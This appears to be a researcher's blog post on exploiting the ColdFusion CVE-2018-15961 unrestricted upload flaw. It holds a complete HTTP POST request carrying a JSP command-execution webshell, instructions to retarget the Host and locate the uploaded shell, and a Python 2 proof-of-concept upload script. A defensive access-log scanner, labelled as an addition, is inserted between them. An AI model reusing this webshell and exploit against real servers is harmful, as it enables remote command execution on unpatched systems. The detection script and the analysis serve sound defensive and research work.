Adobe notes in its new bulletin that CVE-2018-15961 is being exploited in the wild: https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html The earliest public analysis I found is https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-patched-coldfusion-vulnerability-cve-2018-15961/ but it does not show the actual POST request. I set up the environment locally, captured the traffic, and got the final POST request that yields a shell:
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: 172.16.59.130:8500
Content-Length: 1115
Cache-Control: max-age=0
Origin: http://172.16.59.130:8500
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynLGnAOgQ8df3hQ61
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.59.130:8500/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: JSESSIONID=E69D416EB891D3E7CDBF0FE787F13E79.cfusion
Connection: close

------WebKitFormBoundarynLGnAOgQ8df3hQ61
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
------WebKitFormBoundarynLGnAOgQ8df3hQ61
Content-Disposition: form-data; name="path"

1
------WebKitFormBoundarynLGnAOgQ8df3hQ61--
Change the Host to your target. Note that the path parameter must be specified. After a successful upload, an uploadedFiles directory is created under the filemanager directory, and the uploaded webshell is placed there. A default ColdFusion deployment also has a directory-listing vulnerability, so finding the uploaded file is not hard. If a file with the same name, xxoo.jsp, already exists in uploadedFiles, the newly uploaded file is renamed to xxoo1.jsp, xxoo2.jsp.
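As an added defender-side example (not part of the original post), the Python 3 script below scans web-server access-log lines for the two-step sequence described above: a POST to the filemanager upload.cfm, followed by a request for a server-executable file under uploadedFiles/. The Combined Log Format, the sample lines and IPs, and the set of executable extensions are assumptions.

```python
import re
from collections import defaultdict
FILEMANAGER = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/"
UPLOAD_CFM = FILEMANAGER + "upload.cfm"
UPLOADED_DIR = FILEMANAGER + "uploadedfiles/"  # paths are lower-cased before comparison
EXEC_EXTS = (".jsp", ".jspx", ".cfm", ".cfc", ".cfml")  # executed server-side (assumed set)

# Constructed sample lines in Combined Log Format; not taken from the original post.
SAMPLE_LOG = """\
172.16.59.1 - - [08/Nov/2018:10:12:01 +0000] "GET /index.cfm HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
172.16.59.1 - - [08/Nov/2018:10:12:05 +0000] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload HTTP/1.1" 200 93 "-" "Mozilla/5.0"
172.16.59.1 - - [08/Nov/2018:10:12:07 +0000] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/poc.jsp HTTP/1.1" 200 210 "-" "Mozilla/5.0"
10.0.0.7 - - [08/Nov/2018:10:13:00 +0000] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/logo.png HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Nov/2018:10:14:00 +0000] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/xxoo1.jsp?cmd=id HTTP/1.1" 200 300 "-" "curl/7.58.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0].lower()  # drop query string, normalise case
    return rec

def classify(rec):
    """Tag a record as the upload step, the execution step, or neither."""
    if rec["method"] == "POST" and rec["path"] == UPLOAD_CFM:
        return "filemanager_upload"
    if rec["path"].startswith(UPLOADED_DIR) and rec["path"].endswith(EXEC_EXTS):
        return "uploaded_script_executed"
    return None

def scan(log_text):
    """Return {source_ip: [tags in log order]} for every IP that touched either step."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        tag = classify(rec) if rec else None
        if tag:
            findings[rec["ip"]].append(tag)
    return dict(findings)

def likely_exploited(findings):
    # IPs showing the full sequence: POST to upload.cfm, then a script fetched from uploadedFiles.
    return sorted(ip for ip, tags in findings.items()
                  if "filemanager_upload" in tags and "uploaded_script_executed" in tags)
```

A fetch of a non-executable file from uploadedFiles (the logo.png line) is deliberately not flagged, since legitimate CKEditor uploads land in the same directory.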
Lastly, I hope everyone takes care of their own safety when researching this vulnerability. Several foreign media outlets have already said this vulnerability is suspected to be used in Chinese APT attacks, and someone has used it to upload China Chopper (Caidao).
#update 2018-11-20: adding the Python version of the PoC:
import argparse
import httplib
import sys


def parse_args(argv):
    # parse_args() was referenced but not defined in the posted snippet; this
    # minimal argparse version (an assumption) accepts "--host <ip> --port <n>".
    parser = argparse.ArgumentParser(description="CVE-2018-15961 PoC")
    parser.add_argument("--host", required=True)
    parser.add_argument("--port", type=int, default=8500)  # 8500 is the ColdFusion developer-edition default
    return vars(parser.parse_args(argv))


def main(argv):
    print "Proof of Concept"
    print "Copyright Trend Micro Security Research"
    print "All Rights Reserved.\n"
    args = parse_args(argv)
    host = args['host']
    port = args['port']
    # Upload file
    CRLF = "\r\n"
    body = '--XX' + CRLF
    body += 'Content-Disposition: form-data; name="path"' + CRLF
    body += CRLF
    body += '/home/' + CRLF
    body += '--XX' + CRLF
    body += 'Content-Disposition: form-data; name="file"; filename="poc.jsp"' + CRLF
    body += 'Content-Type: application/octet-stream' + CRLF
    body += CRLF
    body += '''<%@ page import="java.util.*, java.io.*" %>
<% Runtime run = Runtime.getRuntime();
Process p = run.exec("calc.exe");
try{ p.waitFor(); }
catch(InterruptedException e)
{ System.out.println(e); } %> ''' + CRLF
    body += "--XX--"
    lenn = str(len(body))
    headers = {"Accept": "*/*",
               "Connection": "keep-alive",
               "Host": host + ":" + str(port),
               "Content-Length": "" + lenn,
               "Content-Type": "multipart/form-data; boundary=XX"}
    conN = httplib.HTTPConnection(host + ":" + str(port))
    print "[*] Uploading .jsp file to server..."
    conN.request("POST", "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload",
                 body, headers)
    response = conN.getresponse()
    buf = response.read()
    print "[*] Requesting uploaded .jsp file..."
    conN = httplib.HTTPConnection(host + ":" + str(port))
    conN.request("GET", "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/poc.jsp")
    conN.getresponse().read()  # read the reply so the request completes before exit
    print "[*] Check the server to see if CVE-2018-15961 has been triggered.\n"


if __name__ == "__main__":
    main(sys.argv[1:])